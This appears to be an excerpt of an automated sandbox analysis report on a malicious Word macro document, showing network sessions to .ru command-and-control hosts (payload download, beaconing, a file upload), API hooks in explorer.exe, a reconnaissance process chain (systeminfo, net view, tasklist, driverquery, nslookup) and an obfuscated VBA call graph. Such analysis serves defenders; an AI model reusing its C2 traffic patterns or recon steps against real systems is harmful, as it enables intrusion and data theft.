                    Mr 20, 2019 16:37:49.700542927 MEZ12INData Raw: 86 0d 23 22 22 c2 bc 64 2e b2 db ed 0c 1f 3e 9c ec ec 6c 4f ee a1 14 11 11 11 11 11 29 b3 92 92 92 68 dd ba 35 ad 5b b7 36 b5 8e bf bf 3f 9d 3b 77 66 f6 ec d9 14 16 16 ba 3a 2c 10 e7 59 00 b1 e6 25 f3 3e 5f 6e 00 00 6c 00 7a 01 8d 5c 1d 70 eb d6
                    Data Ascii: #""d.>lO)h5[6?;wf:,Y%>_nlz\p-7n+W6-l6B[8"""""">c;jZvaw5y^sRy_i8 vgP6miUT1',XqQDDDDDD|Btt4[lB)((SNn2I]x
                    Mr 20, 2019 16:37:49.732690096 MEZ14INData Raw: 1d 48 35 2d 98 c1 ca 52 03 a0 08 58 04 74 c2 79 4d a0 5b d6 af 5f 4f 7e 7e 3e fd fa f5 33 3c 98 11 ec 76 3b 5d ba 74 61 e2 c4 89 64 66 66 f2 fd f7 df 5b 1d 49 44 44 44 44 44 c4 2b 36 6e dc c8 d3 4f 3f 4d 85 0a 15 4c ab 51 a7 4e 1d 32 32 32 d8 b3
                    Data Ascii: H5-RXtyM[_O~~>3<v;]tadff[IDDDDD+6nO?MLQN222g;:3q~yeP,ui&+CnW$"""""bWrljn'pMW;KeP ?O0Pre#/''S2}tu]v


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.1.8349205178.169.196.8380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Mr 20, 2019 16:38:56.260993958 MEZ808OUTGET /free/t32.bin HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: interruption.ru
                    Mr 20, 2019 16:38:56.423000097 MEZ809INHTTP/1.1 404 Not Found
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:38:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 1573
                    Connection: close
                    Referrer-Policy: no-referrer
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e
                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.
                    Mr 20, 2019 16:38:56.423110962 MEZ810INData Raw: 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63
                    Data Ascii: com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.1.834920637.152.176.9080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Mr 20, 2019 16:39:00.572242022 MEZ812OUTGET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
                    Host: profitsproject.ru
                    Mr 20, 2019 16:39:01.055056095 MEZ812INHTTP/1.1 200 OK
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:38:50 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 288
                    Connection: close
                    Data Raw: 0c de b3 bb ea 41 e6 2a ce d5 f6 1f 07 92 e4 88 04 3b cf 89 dc f4 b9 af f4 bd 6d ae a5 6d c3 a1 91 e7 e7 ed 67 33 5d 5b 1d d1 32 3c 51 e6 8f 33 82 a8 28 12 c1 9b 25 d5 5b 6f 4f ad e9 50 bd b8 97 e1 dc dd 7c 32 58 6f 5b 16 e5 00 4d c3 4f c4 bb d7 e0 56 6e 3e 4d 93 04 f2 08 05 24 ab 34 09 08 71 8e 20 6e 5e 30 2d 18 1c 3a 53 61 c1 9c 39 2f 5f 1e a5 61 54 fd e0 99 84 e2 b9 9f e6 d4 83 10 05 d3 6e 36 44 91 ee bb f1 ef 6a 8a bc 55 a7 7d 59 fe 79 01 22 97 04 ab ae f2 ef 02 4f b8 00 e9 7a fe ae 16 f1 74 ba 37 b3 8c 37 60 de d0 f6 a8 65 55 64 b0 82 fb 21 e1 1f 97 eb e1 4d 00 da 34 f9 71 09 a1 06 fd 35 5a 28 17 73 56 24 a9 e7 e2 97 60 11 90 f1 72 f2 92 86 d3 aa e6 da 7d e7 f2 2b 8c 51 31 d8 74 f2 b3 e3 45 68 7e 75 94 08 ec 51 fa 72 0b 5d f1 ef 0f 75 1b 87 1d 30 ae 2b 27 84 7f ab 76 74 fc 5a 95 8d 26 73 5c a4 a6 93 32 39 c1 81 a8 bd ae 1c af 7d 23 c5 a7 2b 2d 1e
                    Data Ascii: A*;mmg3][2<Q3(%[oOP|2Xo[MOVn>M$4q n^0-:Sa9/_aTn6DjU}Yy"Ozt77`eUd!M4q5Z(sV$`r}+Q1tEh~uQr]u0+'vtZ&s\29}#+-


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.1.834920746.139.176.15180C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Mr 20, 2019 16:39:11.897363901 MEZ814OUTPOST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Content-Type: multipart/form-data; boundary=382116919742642393088
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
                    Content-Length: 401
                    Host: profitsproject.ru
                    Mr 20, 2019 16:39:11.897511005 MEZ815OUTData Raw: 2d 2d 33 38 32 31 31 36 39 31 39 37 34 32 36 34 32 33 39 33 30 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e
                    Data Ascii: --382116919742642393088Content-Disposition: form-data; name="upload_file"; filename="3E76.bin"[@6u&7teC'c@srbl9M*<{)9`te"y? Efz4- }xMvOrzq<Y
                    Mr 20, 2019 16:39:12.168243885 MEZ815INHTTP/1.1 200 OK
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:39:01 GMT
                    Content-Type: text/html
                    Connection: close


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    CreateProcessWEATexplorer.exe
                    CreateProcessWINLINEexplorer.exe
                    CreateProcessAEATexplorer.exe
                    CreateProcessAINLINEexplorer.exe
                    CreateProcessAsUserWEATexplorer.exe
                    CreateProcessAsUserWINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: kernel32.dll
                    Function NameHook TypeNew Data
                    CreateProcessWEAT75329000
                    CreateProcessWINLINE0xE9 0x9C 0xC7 0x74 0x48 0x8A
                    CreateProcessAEAT75329005
                    CreateProcessAINLINE0xE9 0x94 0x47 0x74 0x49 0x9A
                    CreateProcessAsUserWEAT7532900A
                    CreateProcessAsUserWINLINE0xE9 0x92 0x25 0x54 0x4A 0xAA

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: WINWORD.EXE PID: 3384 Parent PID: 536

                    General

                    Start time:16:37:56
                    Start date:20/03/2019
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Imagebase:0x2f470000
                    File size:1423008 bytes
                    MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: text.doc.16147.scr PID: 3300 Parent PID: 3384

                    General

                    Start time:16:38:10
                    Start date:20/03/2019
                    Path:C:\Users\user\text.doc.16147.scr
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\text.doc.16147.scr
                    Imagebase:0x400000
                    File size:783857 bytes
                    MD5 hash:2481F6BE75307B79607D12114D2B6102
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: explorer.exe PID: 3000 Parent PID: 3300

                    General

                    Start time:16:38:54
                    Start date:20/03/2019
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0xa60000
                    File size:2972672 bytes
                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 472 Parent PID: 3000

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
                    Imagebase:0x4a2a0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: nslookup.exe PID: 3096 Parent PID: 472

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\nslookup.exe
                    Wow64 process (32bit):false
                    Commandline:nslookup myip.opendns.com resolver1.opendns.com
                    Imagebase:0xa20000
                    File size:98304 bytes
                    MD5 hash:5E3830EE3282A53920E00784FEC44CFD
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2076 Parent PID: 3000

                    General

                    Start time:16:39:18
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
                    Imagebase:0x49df0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 3676 Parent PID: 3000

                    General

                    Start time:16:39:21
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4acc0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: systeminfo.exe PID: 3620 Parent PID: 3676

                    General

                    Start time:16:39:21
                    Start date:20/03/2019
                    Path:C:\Windows\System32\systeminfo.exe
                    Wow64 process (32bit):false
                    Commandline:systeminfo.exe
                    Imagebase:0x9f0000
                    File size:75776 bytes
                    MD5 hash:258B2ED54FC7F74E2FDCCE5861549C1A
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: avicbrkr.exe PID: 3824 Parent PID: 3000

                    General

                    Start time:16:39:28
                    Start date:20/03/2019
                    Path:C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
                    Imagebase:0x400000
                    File size:783857 bytes
                    MD5 hash:2481F6BE75307B79607D12114D2B6102
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 3640 Parent PID: 3000

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x49da0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2260 Parent PID: 3000

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a870000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: net.exe PID: 2316 Parent PID: 2260

                    General

                    Start time:16:39:29
                    Start date:20/03/2019
                    Path:C:\Windows\System32\net.exe
                    Wow64 process (32bit):false
                    Commandline:net view
                    Imagebase:0x160000
                    File size:46080 bytes
                    MD5 hash:B9A4DAC2192FD78CDA097BFA79F6E7B2
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2368 Parent PID: 3000

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a040000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2248 Parent PID: 3000

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4acd0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: nslookup.exe PID: 2384 Parent PID: 2248

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\nslookup.exe
                    Wow64 process (32bit):false
                    Commandline:nslookup 127.0.0.1
                    Imagebase:0x4e0000
                    File size:98304 bytes
                    MD5 hash:5E3830EE3282A53920E00784FEC44CFD
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2332 Parent PID: 3000

                    General

                    Start time:16:39:40
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a220000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 3964 Parent PID: 3000

                    General

                    Start time:16:39:41
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a8e0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: tasklist.exe PID: 2468 Parent PID: 3964

                    General

                    Start time:16:39:41
                    Start date:20/03/2019
                    Path:C:\Windows\System32\tasklist.exe
                    Wow64 process (32bit):false
                    Commandline:tasklist.exe /SVC
                    Imagebase:0x490000
                    File size:80896 bytes
                    MD5 hash:A9A00E71E3DD67B029FC904FE3BB61DA
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2364 Parent PID: 3000

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a7b0000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 2340 Parent PID: 3000

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
                    Imagebase:0x4a460000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Analysis Process: driverquery.exe PID: 2324 Parent PID: 2340

                    General

                    Start time:16:39:43
                    Start date:20/03/2019
                    Path:C:\Windows\System32\driverquery.exe
                    Wow64 process (32bit):false
                    Commandline:driverquery.exe
                    Imagebase:0x940000
                    File size:66048 bytes
                    MD5 hash:5D1CFD8CF86F05BB27926C9A6893B635
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    VBA Code

                    Call Graph

                    Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
                    callgraph 2 x CStr:1 789 I8BD2 send:1,Open:1 2->789 4757 test1 CreateObject:1,UBound:2 2->4757 7646 sh1 Shell:1 2->7646 8394 BjOEsxO3 Asc:1,Len:1,Mid:1,Chr:1 2->8394 1955 test1 CreateObject:1,UBound:2 4263 sh1 Shell:1 8154 Document_Open CStr:1,Environ:2 8154->2

                    Module: J04Xt

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "J04Xt"

                    Executed Functions
                    Subroutine x, APIs: 110, Strings: 16, Number of lines: 143, Relevance: 189.143
                    APIsMeta Information

                    Ik728

                    A014z

                    UrERz

                    Part of subcall function BjOEsxO3@U2YLn: OCkrm

                    Part of subcall function BjOEsxO3@U2YLn: AST0b

                    Part of subcall function BjOEsxO3@U2YLn: ZYu1R

                    Part of subcall function BjOEsxO3@U2YLn: HsaCb

                    Part of subcall function BjOEsxO3@U2YLn: Len

                    Part of subcall function BjOEsxO3@U2YLn: BbA1x

                    Part of subcall function BjOEsxO3@U2YLn: Chr

                    Part of subcall function BjOEsxO3@U2YLn: Asc

                    Part of subcall function BjOEsxO3@U2YLn: Mid

                    Part of subcall function BjOEsxO3@U2YLn: OjKf2

                    YcIPR

                    MRbO5

                    Part of subcall function I8BD2@JtuJu: VKsr5

                    Part of subcall function I8BD2@JtuJu: VFDa2

                    Part of subcall function I8BD2@JtuJu: QGdom

                    Part of subcall function I8BD2@JtuJu: TO8KM

                    Part of subcall function I8BD2@JtuJu: H87Y8

                    Part of subcall function I8BD2@JtuJu: XPcZ8

                    Part of subcall function I8BD2@JtuJu: Wt628

                    Part of subcall function I8BD2@JtuJu: Open

                    Part of subcall function I8BD2@JtuJu: Lyu7w

                    Part of subcall function I8BD2@JtuJu: YT4R3

                    Part of subcall function I8BD2@JtuJu: ECehc

                    Part of subcall function I8BD2@JtuJu: CTt54

                    Part of subcall function I8BD2@JtuJu: send

                    Part of subcall function I8BD2@JtuJu: IO4H1

                    Part of subcall function I8BD2@JtuJu: DMpT6

                    Part of subcall function I8BD2@JtuJu: V6si1

                    Part of subcall function I8BD2@JtuJu: WlH6E

                    Part of subcall function I8BD2@JtuJu: JNo8v

                    Part of subcall function I8BD2@JtuJu: D7Hyo

                    Part of subcall function I8BD2@JtuJu: responseBody

                    Part of subcall function I8BD2@JtuJu: FuUpS

                    Part of subcall function I8BD2@JtuJu: G065k

                    Part of subcall function I8BD2@JtuJu: FG3dN

                    CStr

                    NIuZE

                    EP2DB

                    ZvDa2

                    Part of subcall function test1@ThisDocument: JiIyy

                    Part of subcall function test1@ThisDocument: I70P3

                    Part of subcall function test1@ThisDocument: HZibc

                    Part of subcall function test1@ThisDocument: BcLv2

                    Part of subcall function test1@ThisDocument: C0Vfq

                    Part of subcall function test1@ThisDocument: BxYtT

                    Part of subcall function test1@ThisDocument: OhAx1

                    Part of subcall function test1@ThisDocument: NzkP8

                    Part of subcall function test1@ThisDocument: Eg1q6

                    Part of subcall function test1@ThisDocument: F2gVH

                    Part of subcall function test1@ThisDocument: LKbGd

                    Part of subcall function test1@ThisDocument: G1jcm

                    Part of subcall function test1@ThisDocument: GE8D2

                    Part of subcall function test1@ThisDocument: CySUV

                    Part of subcall function test1@ThisDocument: W8fJH

                    Part of subcall function test1@ThisDocument: D18NP

                    Part of subcall function test1@ThisDocument: RzEI8

                    Part of subcall function test1@ThisDocument: FG8Ql

                    Part of subcall function test1@ThisDocument: Us6o1

                    Part of subcall function test1@ThisDocument: Z2VyP

                    Part of subcall function test1@ThisDocument: CFq3n

                    Part of subcall function test1@ThisDocument: UDtTh

                    Part of subcall function test1@ThisDocument: D6zNx

                    Part of subcall function test1@ThisDocument: NGKGP

                    Part of subcall function test1@ThisDocument: Y2Jti

                    Part of subcall function test1@ThisDocument: GLr0d

                    Part of subcall function test1@ThisDocument: MvykX

                    Part of subcall function test1@ThisDocument: JS08j

                    Part of subcall function test1@ThisDocument: N6b2y

                    Part of subcall function test1@ThisDocument: Ace62

                    Part of subcall function test1@ThisDocument: A7h7X

                    Part of subcall function test1@ThisDocument: US5tA

                    Part of subcall function test1@ThisDocument: R0be7

                    Part of subcall function test1@ThisDocument: UBound

                    Part of subcall function test1@ThisDocument: UBound

                    Part of subcall function test1@ThisDocument: A7fA2

                    Part of subcall function test1@ThisDocument: Pt7t4

                    Part of subcall function test1@ThisDocument: O5Fw8

                    Part of subcall function test1@ThisDocument: K83vS

                    Part of subcall function test1@ThisDocument: Nzfy5

                    Part of subcall function test1@ThisDocument: XBsOm

                    Part of subcall function test1@ThisDocument: LBzBN

                    Part of subcall function test1@ThisDocument: Bpcx3

                    Part of subcall function test1@ThisDocument: B2864

                    Part of subcall function test1@ThisDocument: B3Q2l

                    Part of subcall function test1@ThisDocument: A35Ls

                    Part of subcall function test1@ThisDocument: N578T

                    Part of subcall function test1@ThisDocument: Open

                    Part of subcall function test1@ThisDocument: U3038

                    Part of subcall function test1@ThisDocument: Y0SFj

                    Part of subcall function test1@ThisDocument: EqDjd

                    Part of subcall function test1@ThisDocument: J6Xnm

                    Part of subcall function test1@ThisDocument: Gn0p5

                    Part of subcall function test1@ThisDocument: X6RIx

                    Part of subcall function test1@ThisDocument: TyTNz

                    Part of subcall function sh1@ThisDocument: H0M0p

                    Part of subcall function sh1@ThisDocument: Kh1g3

